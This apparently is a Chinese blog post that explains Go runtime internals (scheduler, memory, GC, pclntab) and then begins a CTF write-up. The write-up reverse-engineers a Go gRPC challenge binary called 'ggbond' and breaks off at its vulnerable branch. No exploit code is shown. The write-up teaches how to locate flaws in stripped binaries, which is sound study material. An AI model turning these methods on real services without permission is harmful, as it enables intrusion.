113
114
115
116
117
118
119
type schedt struct {
goidgen atomic.Uint64
lastpoll atomic.Int64 // time of last network poll, 0 if currently polling
pollUntil atomic.Int64 // time to which current poll is sleeping

lock mutex

// When increasing nmidle, nmidlelocked, nmsys, or nmfreed, be
// sure to call checkdead().

midle muintptr // idle m's waiting for work
nmidle int32 // number of idle m's waiting for work
nmidlelocked int32 // number of locked m's waiting for work
mnext int64 // number of m's that have been created and next M ID
maxmcount int32 // maximum number of m's allowed (or die)
nmsys int32 // number of system m's not counted for deadlock
nmfreed int64 // cumulative number of freed m's

ngsys atomic.Int32 // number of system goroutines

pidle puintptr // idle p's
npidle atomic.Int32 // idle P的数量
nmspinning atomic.Int32 // See "Worker thread parking/unparking" comment in proc.go.
needspinning atomic.Uint32 // See "Delicate dance" comment in proc.go. Boolean. Must hold sched.lock to set to 1.

// Global runnable queue.
runq gQueue
runqsize int32

// disable controls selective disabling of the scheduler.
//
// Use schedEnableUser to control this.
//
// disable is protected by sched.lock.
disable struct {
// user disables scheduling of user goroutines.
user bool
runnable gQueue // pending runnable Gs
n int32 // length of runnable
}

// Global cache of dead G's.
gFree struct {
lock mutex
stack gList // Gs with stacks
noStack gList // Gs without stacks
n int32
}

// Central cache of sudog structs.
sudoglock mutex
sudogcache *sudog

// Central pool of available defer structs.
deferlock mutex
deferpool *_defer

// freem is the list of m's waiting to be freed when their
// m.exited is set. Linked through m.freelink.
freem *m

gcwaiting atomic.Bool // gc is waiting to run
stopwait int32
stopnote note
sysmonwait atomic.Bool
sysmonnote note

// safePointFn should be called on each P at the next GC
// safepoint if p.runSafePointFn is set.
safePointFn func(*p)
safePointWait int32
safePointNote note

profilehz int32 // cpu profiling rate

procresizetime int64 // nanotime() of last change to gomaxprocs
totaltime int64 // ∫gomaxprocs dt up to procresizetime

// sysmonlock protects sysmon's actions on the runtime.
//
// Acquire and hold this mutex to block sysmon from interacting
// with the rest of the runtime.
sysmonlock mutex

// timeToRun is a distribution of scheduling latencies, defined
// as the sum of time a G spends in the _Grunnable state before
// it transitions to _Grunning.
timeToRun timeHistogram

// idleTime is the total CPU time Ps have "spent" idle.
//
// Reset on each GC cycle.
idleTime atomic.Int64

// totalMutexWaitTime is the sum of time goroutines have spent in _Gwaiting
// with a waitreason of the form waitReasonSync{RW,}Mutex{R,}Lock.
totalMutexWaitTime atomic.Int64

// stwStoppingTimeGC/Other are distributions of stop-the-world stopping
// latencies, defined as the time taken by stopTheWorldWithSema to get
// all Ps to stop. stwStoppingTimeGC covers all GC-related STWs,
// stwStoppingTimeOther covers the others.
stwStoppingTimeGC timeHistogram
stwStoppingTimeOther timeHistogram

// stwTotalTimeGC/Other are distributions of stop-the-world total
// latencies, defined as the total time from stopTheWorldWithSema to
// startTheWorldWithSema. This is a superset of
// stwStoppingTimeGC/Other. stwTotalTimeGC covers all GC-related STWs,
// stwTotalTimeOther covers the others.
stwTotalTimeGC timeHistogram
stwTotalTimeOther timeHistogram

// totalRuntimeLockWaitTime (plus the value of lockWaitTime on each M in
// allm) is the sum of time goroutines have spent in _Grunnable and with an
// M, but waiting for locks within the runtime. This field stores the value
// for Ms that have exited.
totalRuntimeLockWaitTime atomic.Int64
}
  • 其中有 M 的 idle 队列,P 的 idle 队列,以及一个全局的就绪的 G 队列

G-P-M 模型

G-P-M 模型是基于线程池演化而来:

  • 把每个工作线程叫 worker 的话,每条线程运行一个 worker
  • 每个 worker 做的事情就是不停地从队列中取出任务并执行

在 G-P-M 模型中:

  • G 就是我们需要完成的任务
  • M 就是一个 worker(一条线程)
  • Sched 相当于管理可运行 G 的全局任务队列(当然也包括了其他的辅助信息)
  • P 则是在 go-1.1 中才引入的内容,为了解决 G 阻塞导致的 M 资源浪费问题

G-P-M 模型图解:

  • G:goroutine 协程
    • 通过 go 关键字创建,封装了所要执行的代码逻辑
    • 属于用户级资源,对 OS 透明,具备轻量级,可以大量创建,上下文切换成本低等特点
  • P:Processor 逻辑处理器
    • 默认 go 运行时的 Processor 数量等于 CPU 数量,也可以通过 GOMAXPROCS 函数指定 P 的数量
    • P 的主要作用是管理 G 运行,每个 P 拥有一个本地队列并为 G 在 M 上的运行提供本地化资源
  • M:Machine 操作系统创建的系统线程
    • 作用是执行 G 中包装的并行任务,被称为物理处理器
    • 其属于 OS 资源,可以创建的数量上也受限于 OS,通常情况下 G 的数量都多于活跃的 M
    • go 运行时调度器将 G 公平合理的安排到多个 M 上去执行
  • G和M的关系:
    • G是要执行的任务,M是具体执行G的工作线程,通过P建立G和M的联系从而执行
  • G和P的关系:
    • P是G的管理者,P将G交由M执行,并管理一定系统资源供G使用,一个P管理存储在其本地队列的所有G(P和G是1:n的关系)
  • P和M的关系:
    • P将管理的G交由M具体执行,当遇到阻塞时,P可以与M解绑,并找到空闲的M进行绑定继续执行队列中其他可执行的G(P和M是1:1的关系)

P 会从 Sched 中拿取 G 并加入自己的任务队列(在该任务队列中使用轻量级切换,不涉及内核),然后 P 将自己任务队列中的 G 交给 M 执行,一旦 G 阻塞,P 就会与 M 解除绑定,并寻找空闲的 M 继续执行任务队列中的 G,如果 P 中的任务队列全部执行完毕,则 P 会随机从其它 P 中窃取一半的可运行的 G

创建&销毁 goroutine

函数 runtime.newproc 会创建一个新的 G 结构体(核心工作由 runtime.newproc1 完成)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
// newproc1 prepares a g that will run fn and returns it.
//
// It reuses a g obtained from gfget(pp) or, if none is available, allocates
// one with malg(stackMin). It then builds the saved context in newg.sched so
// that the g starts in fn and returns into goexit, records caller
// information, assigns a goid from the P-local goid cache, and switches the
// g from _Gdead to _Grunnable (or to _Gwaiting with the given waitreason
// when parked is true).
//
// Nothing in this function places the g on a run queue; the returned g is
// handed back to the caller.
func newproc1(fn *funcval, callergp *g, callerpc uintptr, parked bool, waitreason waitReason) *g {
if fn == nil {
fatal("go of nil func value")
}

mp := acquirem() /* get the current M */
pp := mp.p.ptr() /* the P attached to the current M */
newg := gfget(pp) /* look for an available g that can be reused */
if newg == nil {
newg = malg(stackMin) /* create a g with a stack of stackMin bytes */
casgstatus(newg, _Gidle, _Gdead) /* move the newly created g from _Gidle to _Gdead */
allgadd(newg) /* register it in the runtime's allg list */
}
if newg.stack.hi == 0 {
throw("newproc1: newg missing stack")
}

if readgstatus(newg) != _Gdead {
throw("newproc1: new g is not Gdead")
}

totalSize := uintptr(4*goarch.PtrSize + sys.MinFrameSize) // extra space in case of reads slightly beyond frame
totalSize = alignUp(totalSize, sys.StackAlign)
sp := newg.stack.hi - totalSize
if usesLR {
// caller's LR
*(*uintptr)(unsafe.Pointer(sp)) = 0
prepGoExitFrame(sp)
}
if GOARCH == "arm64" {
// caller's FP
*(*uintptr)(unsafe.Pointer(sp - goarch.PtrSize)) = 0
}

memclrNoHeapPointers(unsafe.Pointer(&newg.sched), unsafe.Sizeof(newg.sched))
newg.sched.sp = sp /* save sp, pc and the rest of the context in the g's sched field */
newg.stktopsp = sp
newg.sched.pc = abi.FuncPCABI0(goexit) + sys.PCQuantum // +PCQuantum so that previous instruction is in same function
newg.sched.g = guintptr(unsafe.Pointer(newg))
gostartcallfn(&newg.sched, fn)
newg.parentGoid = callergp.goid
newg.gopc = callerpc
newg.ancestors = saveAncestors(callergp)
newg.startpc = fn.fn
if isSystemGoroutine(newg, false) {
sched.ngsys.Add(1)
} else {
// Only user goroutines inherit pprof labels.
if mp.curg != nil {
newg.labels = mp.curg.labels
}
if goroutineProfile.active {
// A concurrent goroutine profile is running. It should include
// exactly the set of goroutines that were alive when the goroutine
// profiler first stopped the world. That does not include newg, so
// mark it as not needing a profile before transitioning it from
// _Gdead.
newg.goroutineProfiled.Store(goroutineProfileSatisfied)
}
}
// Track initial transition?
newg.trackingSeq = uint8(cheaprand())
if newg.trackingSeq%gTrackingPeriod == 0 {
newg.tracking = true
}
gcController.addScannableStack(pp, int64(newg.stack.hi-newg.stack.lo)) /* report this g's stack size (hi - lo) to the GC controller */

// Get a goid and switch to runnable. Make all this atomic to the tracer.
trace := traceAcquire()
var status uint32 = _Grunnable
if parked {
status = _Gwaiting
newg.waitreason = waitreason
}
casgstatus(newg, _Gdead, status)

/* Allocate the goroutine id from this P's goid cache, refilling the cache from sched.goidgen when it is exhausted */
if pp.goidcache == pp.goidcacheend {
// Sched.goidgen is the last allocated id,
// this batch must be [sched.goidgen+1, sched.goidgen+GoidCacheBatch].
// At startup sched.goidgen=0, so main goroutine receives goid=1.
pp.goidcache = sched.goidgen.Add(_GoidCacheBatch)
pp.goidcache -= _GoidCacheBatch - 1
pp.goidcacheend = pp.goidcache + _GoidCacheBatch
}
newg.goid = pp.goidcache
pp.goidcache++
newg.trace.reset()
if trace.ok() {
trace.GoCreate(newg, newg.startpc, parked)
traceRelease(trace)
}

// Set up race context.
if raceenabled {
newg.racectx = racegostart(callerpc)
newg.raceignore = 0
if newg.labels != nil {
// See note in proflabel.go on labelSync's role in synchronizing
// with the reads in the signal handler.
racereleasemergeg(newg, unsafe.Pointer(&labelSync))
}
}
releasem(mp)

return newg
}

wakep 函数唤醒 P 时,调度器会试着寻找一个可用的 M 来绑定 P,必要的时候会新建 M,之后的调用链如下:

  • newproc -> newproc1 -> wakep(如果P数目没到上限) -> startm -> newm -> newosproc -> mstart(线程入口) -> schedule -> execute -> goroutine 协程运行
  • execute 会恢复 newproc1 中设置的上下文,这样就跳转到新的 goroutine 去执行了

当 goroutine 的入口函数 fn 执行完返回时,它会返回到 runtime.goexit 中(newproc1 把 newg.sched.pc 设置成了 goexit 的地址),这时 runtime.goexit 会做一些回收工作,会将 G 的状态设置为 Gdead 等,并将 G 挂到 P 的 free 队列中

抢占式 goroutine

go 只是引入了一些很初级的抢占,并没有像操作系统调度那么复杂,没有对 goroutine 分时间片,设置优先级等,只有长时间阻塞于系统调用,或者运行了较长时间才会被抢占

runtime 开了一条后台线程,运行一个 sysmon 函数,这个函数会周期性地做 epoll 操作,同时它还会检测每个 P 是否运行了较长时间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
func sysmon() {
lock(&sched.lock)
sched.nmsys++
checkdead()
unlock(&sched.lock)

lasttrace := int64(0)
idle := 0 // how many cycles in succession we had not wokeup somebody
delay := uint32(0)

for {
if idle == 0 { // start with 20us sleep...
delay = 20
} else if idle > 50 { // start doubling the sleep after 1ms...
delay *= 2
}
if delay > 10*1000 { // up to 10ms
delay = 10 * 1000
}
usleep(delay)

// sysmon should not enter deep sleep if schedtrace is enabled so that
// it can print that information at the right time.
//
// It should also not enter deep sleep if there are any active P's so
// that it can retake P's from syscalls, preempt long running G's, and
// poll the network if all P's are busy for long stretches.
//
// It should wakeup from deep sleep if any P's become active either due
// to exiting a syscall or waking up due to a timer expiring so that it
// can resume performing those duties. If it wakes from a syscall it
// resets idle and delay as a bet that since it had retaken a P from a
// syscall before, it may need to do it again shortly after the
// application starts work again. It does not reset idle when waking
// from a timer to avoid adding system load to applications that spend
// most of their time sleeping.
now := nanotime()
if debug.schedtrace <= 0 && (sched.gcwaiting.Load() || sched.npidle.Load() == gomaxprocs) {
lock(&sched.lock)
if sched.gcwaiting.Load() || sched.npidle.Load() == gomaxprocs {
syscallWake := false
next := timeSleepUntil()
if next > now {
sched.sysmonwait.Store(true)
unlock(&sched.lock)
// Make wake-up period small enough
// for the sampling to be correct.
sleep := forcegcperiod / 2
if next-now < sleep {
sleep = next - now
}
shouldRelax := sleep >= osRelaxMinNS
if shouldRelax {
osRelax(true)
}
syscallWake = notetsleep(&sched.sysmonnote, sleep)
if shouldRelax {
osRelax(false)
}
lock(&sched.lock)
sched.sysmonwait.Store(false)
noteclear(&sched.sysmonnote)
}
if syscallWake {
idle = 0
delay = 20
}
}
unlock(&sched.lock)
}

lock(&sched.sysmonlock)
// Update now in case we blocked on sysmonnote or spent a long time
// blocked on schedlock or sysmonlock above.
now = nanotime()

// trigger libc interceptors if needed
if *cgo_yield != nil {
asmcgocall(*cgo_yield, nil)
}
// poll network if not polled for more than 10ms
lastpoll := sched.lastpoll.Load()
if netpollinited() && lastpoll != 0 && lastpoll+10*1000*1000 < now {
sched.lastpoll.CompareAndSwap(lastpoll, now)
list, delta := netpoll(0) // non-blocking - returns list of goroutines
if !list.empty() {
// Need to decrement number of idle locked M's
// (pretending that one more is running) before injectglist.
// Otherwise it can lead to the following situation:
// injectglist grabs all P's but before it starts M's to run the P's,
// another M returns from syscall, finishes running its G,
// observes that there is no work to do and no other running M's
// and reports deadlock.
incidlelocked(-1)
injectglist(&list)
incidlelocked(1)
netpollAdjustWaiters(delta)
}
}
if GOOS == "netbsd" && needSysmonWorkaround {
// netpoll is responsible for waiting for timer
// expiration, so we typically don't have to worry
// about starting an M to service timers. (Note that
// sleep for timeSleepUntil above simply ensures sysmon
// starts running again when that timer expiration may
// cause Go code to run again).
//
// However, netbsd has a kernel bug that sometimes
// misses netpollBreak wake-ups, which can lead to
// unbounded delays servicing timers. If we detect this
// overrun, then startm to get something to handle the
// timer.
//
// See issue 42515 and
// https://gnats.netbsd.org/cgi-bin/query-pr-single.pl?number=50094.
if next := timeSleepUntil(); next < now {
startm(nil, false, false)
}
}
if scavenger.sysmonWake.Load() != 0 {
// Kick the scavenger awake if someone requested it.
scavenger.wake()
}
// retake P's blocked in syscalls
// and preempt long running G's
if retake(now) != 0 {
idle = 0
} else {
idle++
}
// check if we need to force a GC
if t := (gcTrigger{kind: gcTriggerTime, now: now}); t.test() && forcegc.idle.Load() {
lock(&forcegc.lock)
forcegc.idle.Store(false)
var list gList
list.push(forcegc.g)
injectglist(&list)
unlock(&forcegc.lock)
}
if debug.schedtrace > 0 && lasttrace+int64(debug.schedtrace)*1000000 <= now {
lasttrace = now
schedtrace(debug.scheddetail > 0)
}
unlock(&sched.sysmonlock)
}
}
  • 如果检测到某个 P 的状态为 Prunning,并且它已经运行了超过10ms,则会将 P 的当前的 G 的 stackguard 设置为 StackPreempt
  • 这个操作其实是相当于加上一个标记,通知这个 G 在合适时机进行调度

内存管理

go 是一门带垃圾回收的语言,go 内存管理机制主要有两个方面:

  • 一个方面是内存池
  • 一个方面是垃圾回收

内存池

go 的内存分配器采用了跟 tcmalloc 库相同的实现,是一个带内存池的分配器,底层直接调用操作系统的 mmap 等函数

  • 在多线程方面,每条线程都有自己的本地的内存,当某个线程中内存不足后就向全局分配链中申请内存
  • 在避免内存碎片方面,大块内存直接按页为单位分配,小块内存会切成各种不同的固定大小的块,申请做任意字节内存时会向上取整到最接近的块,将整块分配给申请者以避免随意切割

go 中为每个系统线程分配一个本地的 MCache(结构体 M 中的 MCache 域)

  • 少量的地址分配就直接从 MCache 中分配,并且定期做垃圾回收
  • 大对象直接从全局控制堆上以页(4k)为单位进行分配

分配器的数据结构包括:

  • FixAlloc:固定大小(128kB)的对象的空闲链分配器,被分配器用于管理存储
  • MHeap:分配堆,按页的粒度进行管理(4kB)
  • MSpan:一些由 MHeap 管理的页(分配内存时的基本单元),会切分为等大的内存块
  • MCentral:对于给定尺寸类别的共享的 free list(本质上是空闲列表)
  • MCache:用于小对象的每 M 一个的 cache

垃圾收集

go 语言的垃圾收集有两个策略:

  • 标记清扫算法(go-1.3)
    • 判断一个对象是否为垃圾(从 root 区域的对象是否有直接或间接的引用到这个对象)
    • 开始标记,从根对象出发查找并标记堆中所有存活的对象
    • 遍历堆中的全部对象,回收未被标记的垃圾对象并将回收的内存加入空闲链表
  • 三色标记法(go-1.5)
    • 黑色 Black:表示对象是可达的,即使用中的对象,黑色是已经被扫描的对象
    • 灰色 Grey:表示被黑色对象直接引用的对象,但还没对它进行扫描
    • 白色 White:白色是对象的初始颜色,如果扫描完成后,对象依然还是白色的,说明此对象是垃圾对象
    • 三色标记规则:黑色不能指向白色对象,即黑色可以指向灰色,灰色可以指向白色
  • 增量收集器(go-1.8)
    • 三色标记 + 混合写屏障

运行时符号信息

go 语言 panic 时会有 traceback,不仅有函数调用,还有文件名和行号等信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package main

import "fmt"

func main() { // demo: panic with a pending defer (comments stay on existing lines so the traceback's line 13 still matches)
defer func() {
fmt.Println("test")
}()

var i = 1
var j = 0
if j == 0 {
panic("err") /* panic makes main return early; the deferred func above still runs (prints "test") */
}
k := i / j
fmt.Printf("%d / %d = %d\n", i, j, k)
}
1
2
3
4
5
6
test
panic: err

goroutine 1 [running]:
main.main()
/home/yhellow/桌面/gotest/test.go:13 +0x49

虽然 C 语言的 assert 也能实现这个效果,但底层原理完全不同:

1
__assert_fail("0", "test.c", 8u, "main");
  • C 语言编译器直接将要输出的数据写入 __assert_fail 函数

pclntab 简析

编译器在编译的时候会生成一些额外信息(会记录下函数地址对应的源文件行号,也就是 pc->line 的一张表,简称 pclntab),运行时符号信息就是这样生成的

pclntab 全名是 Program Counter Line Table 程序计数器行数映射表,概要结构如下:

  • Magic Number:魔数
  • instruction size quantum
  • ptr size
  • functions number:函数数量
  • srcfile count number:源文件数量
  • text section start addr:代码段基址
  • func names table offset:函数名称表偏移
  • src file table offset:源码路径表偏移
  • pc table offset:PC表偏移
  • func table offset:函数表偏移

使用 go_parser-master 处理后的 IDA 分析数据如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
.gopclntab:00000000004B8220 F1 FF FF FF                   runtime_symtab dd 0FFFFFFF1h            ; DATA XREF: LOAD:0000000000400398↑o
.gopclntab:00000000004B8220 ; .noptrdata:runtime_firstmoduledata↓o
.gopclntab:00000000004B8220 ; Magic Number
.gopclntab:00000000004B8224 00 00 dw 0
.gopclntab:00000000004B8226 01 db 1 ; instruction size quantum
.gopclntab:00000000004B8227 08 db 8 ; ptr size
.gopclntab:00000000004B8228 9B 05 00 00 00 00 00 00 dq 59Bh ; Functions number
.gopclntab:00000000004B8230 B1 00 00 00 00 00 00 00 dq 0B1h ; srcfile count number
.gopclntab:00000000004B8238 00 10 40 00 00 00 00 00 dq offset internal_cpu_Initialize ; text section start addr, =firstmoduladata.text
.gopclntab:00000000004B8240 60 00 00 00 00 00 00 00 dq 60h ; func names table offset, real addr: 0x4b8280
.gopclntab:00000000004B8248 A0 C1 00 00 00 00 00 00 dq 0C1A0h ; Source file table addr: 0x4c4b60
.gopclntab:00000000004B8250 40 C9 00 00 00 00 00 00 dq 0C940h ; src file table offset, real addr: 0x4c4b60
.gopclntab:00000000004B8258 C0 E3 00 00 00 00 00 00 dq 0E3C0h ; pc table offset, real addr: 0x4c65e0
.gopclntab:00000000004B8260 00 A9 03 00 00 00 00 00 dq 3A900h ; func table offset, real addr: 0x4f2b20

每个函数都可以拥有一些元数据和 PC-Value 表,运行时符号信息由编译器在编译的时候生成,存放在可执行文件中,当程序被执行时,这张表被加载到内存,用于程序运行时辅助 go 的运行时库执行一些处理

一个函数符号表的形式就是一张 PC 的查找表,IDA 分析数据如下:

1
2
3
4
5
6
7
8
9
10
.gopclntab:00000000004F2B20 00 00 00 00                   runtime_functab dd 0                    ; DATA XREF: .noptrdata:0000000000517D28↓o
.gopclntab:00000000004F2B20 ; .noptrdata:0000000000517D40↓o
.gopclntab:00000000004F2B20 ; Function internal_cpu_Initialize @ 0x401000
.gopclntab:00000000004F2B24 E0 2C 00 00 dd 2CE0h ; Func Struct @ 0x4f5800
.gopclntab:00000000004F2B28 60 00 00 00 dd 60h ; Function internal_cpu_processOptions @ 0x401060
.gopclntab:00000000004F2B2C 38 2D 00 00 dd 2D38h ; Func Struct @ 0x4f5858
.gopclntab:00000000004F2B30 C0 05 00 00 dd 5C0h ; Function internal_cpu_doinit @ 0x4015c0
.gopclntab:00000000004F2B34 90 2D 00 00 dd 2D90h ; Func Struct @ 0x4f58b0
.gopclntab:00000000004F2B38 40 0E 00 00 dd 0E40h ; Function internal_cpu_cpuid @ 0x401e40
.gopclntab:00000000004F2B3C D8 2D 00 00 dd 2DD8h ; Func Struct @ 0x4f58f8
  • 第一个条目是函数地址,第二个条目是 Func Struct(用于描述该函数的信息)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
.gopclntab:00000000004F5800 00 00 00 00                   dd 0                                    ; Func Entry @ 0x401000
.gopclntab:00000000004F5804 00 00 00 00 dd 0
.gopclntab:00000000004F5808 10 00 00 00 dd 10h ; args
.gopclntab:00000000004F580C 00 00 00 00 dd 0 ; deferreturn
.gopclntab:00000000004F5810 01 00 00 00 dd 1 ; pcsp
.gopclntab:00000000004F5814 08 00 00 00 dd 8 ; pcfile
.gopclntab:00000000004F5818 0B 00 00 00 dd 0Bh ; pcln
.gopclntab:00000000004F581C 04 00 00 00 dd 4 ; npcdata
.gopclntab:00000000004F5820 00 00 00 00 dd 0 ; cuOffset
.gopclntab:00000000004F5824 7D 00 00 00 dd 7Dh ; startline
.gopclntab:00000000004F5828 00 db 0 ; func_type: normal
.gopclntab:00000000004F5829 00 db 0 ; func_flag
.gopclntab:00000000004F582A 00 db 0
.gopclntab:00000000004F582B 07 db 7 ; nfuncdata
  • 在 go 源码中对应的结构体如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
type _func struct {
sys.NotInHeap // Only in static data

entryOff uint32 // start pc, as offset from moduledata.text/pcHeader.textStart
nameOff int32 // function name, as index into moduledata.funcnametab.

args int32 // in/out args size
deferreturn uint32 // offset of start of a deferreturn call instruction from entry, if any.

pcsp uint32
pcfile uint32
pcln uint32
npcdata uint32
cuOffset uint32 // runtime.cutab offset of this function's CU
startLine int32 // line number of start of function (func keyword/TEXT directive)
funcID abi.FuncID // set for certain special runtime functions
flag abi.FuncFlag
_ [1]byte // pad
nfuncdata uint8 // must be last, must end on a uint32-aligned boundary

// The end of the struct is followed immediately by two variable-length
// arrays that reference the pcdata and funcdata locations for this
// function.

// pcdata contains the offset into moduledata.pctab for the start of
// that index's table. e.g.,
// &moduledata.pctab[_func.pcdata[_PCDATA_UnsafePoint]] is the start of
// the unsafe point table.
//
// An offset of 0 indicates that there is no table.
//
// pcdata [npcdata]uint32

// funcdata contains the offset past moduledata.gofunc which contains a
// pointer to that index's funcdata. e.g.,
// *(moduledata.gofunc + _func.funcdata[_FUNCDATA_ArgsPointerMaps]) is
// the argument pointer map.
//
// An offset of ^uint32(0) indicates that there is no entry.
//
// funcdata [nfuncdata]uint32
}

ggbond

1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=ToABmmiACyxYP6ANjPii/mBNQG9mzJa6bIWHLsokK/NmmbD1vsv7bojlz5M5b8/uc_h6deBc8Nkqg4RmiJv, stripped
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,NX,FORTIFY

程序分析

程序是一个 gRPC 服务器,先使用 /pbtk/extractors/from_binary.py 来获取其 proto 文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
syntax = "proto3";

package GGBond;

option go_package = "./;ggbond";

service GGBondServer {
rpc Handler(Request) returns (Response);
}

// Request is the single argument of the Handler RPC; it carries one of the
// three sub-requests declared below.
message Request {
oneof request { // oneof: at most one of the following fields is set at a time
WhoamiRequest whoami = 100;
RoleChangeRequest role_change = 101;
RepeaterRequest repeater = 102;
}
}

message Response {
oneof response {
WhoamiResponse whoami = 200;
RoleChangeResponse role_change = 201;
RepeaterResponse repeater = 202;
ErrorResponse error = 444;
}
}

message WhoamiRequest {

}

message WhoamiResponse {
string message = 2000;
}

message RoleChangeRequest {
uint32 role = 1001;
}

message RoleChangeResponse {
string message = 2001;
}

message RepeaterRequest {
string message = 1002;
}

message RepeaterResponse {
string message = 2002;
}

message ErrorResponse {
string message = 4444;
}
  • 服务端内置模块为 Handler,其中有3个子功能

使用如下命令编译 proto 文件:

1
python3 -m grpc_tools.protoc -I ./ --python_out=./ --grpc_python_out=. ./ggbond.proto

在开始分析程序前建议用 AlphaGolang 恢复符号

在 RegisterService 函数前断点,开始调试分析:

1
2
3
4
.text:00000000007EE21A 48 8B 0D 8F D1 18 00          mov     rcx, cs:off_97B3B0
.text:00000000007EE221 48 8D 1D 38 B6 46 00 lea rbx, off_C59860 ; "GGBond.GGBondServer"
.text:00000000007EE228 48 8D 3D E1 6A 4A 00 lea rdi, unk_C94D10
.text:00000000007EE22F E8 CC 47 FE FF call google_golang_org_grpc__Server_RegisterService

打印其第二个参数(RBX)的数据,该参数其实是 ServiceDesc 对象,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
type ServiceDesc struct {
ServiceName string
// The pointer to the service interface. Used to check whether the user
// provided implementation satisfies the interface requirements.
HandlerType any
Methods []MethodDesc
Streams []StreamDesc
Metadata any
}

type MethodDesc struct {
MethodName string
Handler methodHandler
}

type StreamDesc struct {
StreamName string
Handler StreamHandler

ServerStreams bool
ClientStreams bool
}
  • MethodDesc 中存储有我们注册的函数
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xc59860
00:0000│ rbx 0xc59860 —▸ 0x8d7742 ◂— 0x472e646e6f424747 ('GGBond.G') /* ServiceName */
01:00080xc59868 ◂— 0x13
02:00100xc59870 —▸ 0x81aba0 ◂— 0x8
03:00180xc59878 ◂— 0x0
04:00200xc59880 —▸ 0xc525c0 —▸ 0x8cff19 ◂— 0x4872656c646e6148 ('HandlerH') /* MethodDesc */
05:00280xc59888 ◂— 0x1
06:00300xc59890 ◂— 0x1
07:00380xc59898 —▸ 0xc94a20 ◂— 0x1010101010101
  • 打印 MethodDesc 的数据如下:
1
2
3
4
5
6
pwndbg> telescope 0xc525c0
00:00000xc525c0 —▸ 0x8cff19 ◂— 0x4872656c646e6148 ('HandlerH')
01:00080xc525c8 ◂— 0x7
02:00100xc525d0 —▸ 0x90bd28 —▸ 0x7ed300 ◂— lea r12, [rsp - 2e8h]
03:00180xc525d8 ◂— 0x0
... ↓ 4 skipped
  • 地址 0x7ed300 所在的函数即是目标函数的 handler:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
void *__fastcall main_ggbond__GGBondServer_Handler_Handler(
__int64 a1,
__int64 (**a2)(void),
__int64 a3,
__int64 a4,
__int64 (**a5)(void))
{
__int64 v5; // rax
__int64 v6; // rbx
__int64 v7; // r14
char *v8; // rcx
__int64 i; // rax
_QWORD *v10; // rax
_QWORD *v11; // rax
__int64 v13; // rax
char v14[80]; // [rsp+40h] [rbp-338h] BYREF
char v15; // [rsp+90h] [rbp-2E8h] BYREF
_QWORD *v16; // [rsp+340h] [rbp-38h]
__int64 v17; // [rsp+348h] [rbp-30h]
__int64 v18; // [rsp+350h] [rbp-28h]
char *v19; // [rsp+358h] [rbp-20h]
__int64 v20; // [rsp+360h] [rbp-18h]
__int64 v21; // [rsp+368h] [rbp-10h]

if ( (unsigned __int64)&v15 <= *(_QWORD *)(v7 + 16) )
runtime_morestack_noctxt();
v18 = v5;
v17 = runtime_newobject();
if ( (*a2)() )
return 0LL;
if ( a5 )
{
v10 = (_QWORD *)runtime_newobject();
*v10 = v18;
if ( dword_C95060 )
v10 = (_QWORD *)runtime_gcWriteBarrierDX();
else
v10[1] = v6;
v16 = v10;
v10[3] = 28LL;
v10[2] = "/GGBond.GGBondServer/Handler";
v11 = (_QWORD *)runtime_newobject();
*v11 = sub_7ED5C0;
v11[1] = v18;
if ( dword_C95060 )
runtime_gcWriteBarrierR9();
else
v11[2] = v6;
return (void *)(*a5)();
}
else
{
((void (*)(void))loc_468D3C)();
v19 = v14;
v20 = 768LL;
v21 = 768LL;
v8 = v14;
for ( i = 0LL; i < 16; ++i )
*v8++ = 16;
v13 = runtime_assertE2I();
(*(void (**)(void))(v13 + 24))(); /* 调用目标函数 */
return &unk_8A32C0;
}
}
  • 我们直接在调用目标函数的地方打断点(b* 0x7ED545),查看目标函数的位置:
1
0x7ed545    call   rdx                           <0x7ed860>
  • 这里的 0x7ed860 即是目标函数的地址

漏洞分析

找到服务端注册函数的位置后,我们可以开始漏洞分析:

  • 程序内置了4个 role(编号为:0,1,2,3)
  • 通过 whoami 命令可以查看当前的 role
  • 通过 role_change 命令则可以切换 role
  • 通过 repeater 可以发送一条长数据(没有限制长度)

漏洞点如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
if ( qword_C94B80 == 3 ) /* 如果role编号为'3' */
